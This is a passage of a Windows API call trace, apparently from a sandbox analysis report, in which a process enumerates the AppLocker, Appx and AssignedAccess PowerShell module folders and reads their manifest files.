dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0176.779] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.779] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0176.779] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0176.779] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0176.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.780] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.780] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0176.780] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", lpFilePart=0x0) returned 0x3d [0176.780] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0176.780] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.780] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0176.781] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0176.781] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0176.781] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.781] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.781] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0176.781] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0176.781] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0176.781] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0176.781] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0176.781] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0176.781] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", lpFilePart=0x0) returned 0x3d [0176.781] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0176.782] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.782] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0176.782] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0176.782] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0176.782] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0176.782] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0176.783] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1")) returned 0x20 [0176.783] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.783] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0176.784] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", lpFilePart=0x0) returned 0x38 [0176.784] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0176.784] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.784] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0176.784] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0176.785] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0176.785] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0176.785] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0176.785] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0176.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.785] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0176.785] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", lpFilePart=0x0) returned 0x38 [0176.785] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0176.786] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.786] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0176.786] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0176.786] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0176.786] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0176.786] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0176.787] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0176.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.787] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0176.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0176.787] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0176.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0176.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0176.787] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0176.787] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", lpFilePart=0x0) returned 0x38 [0176.787] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0176.788] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.788] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0176.788] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0176.788] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0176.788] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0176.788] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0176.789] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0176.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0176.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0176.789] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1")) returned 0x20 [0176.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.790] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0176.790] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", lpFilePart=0x0) returned 0x42 [0176.790] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, 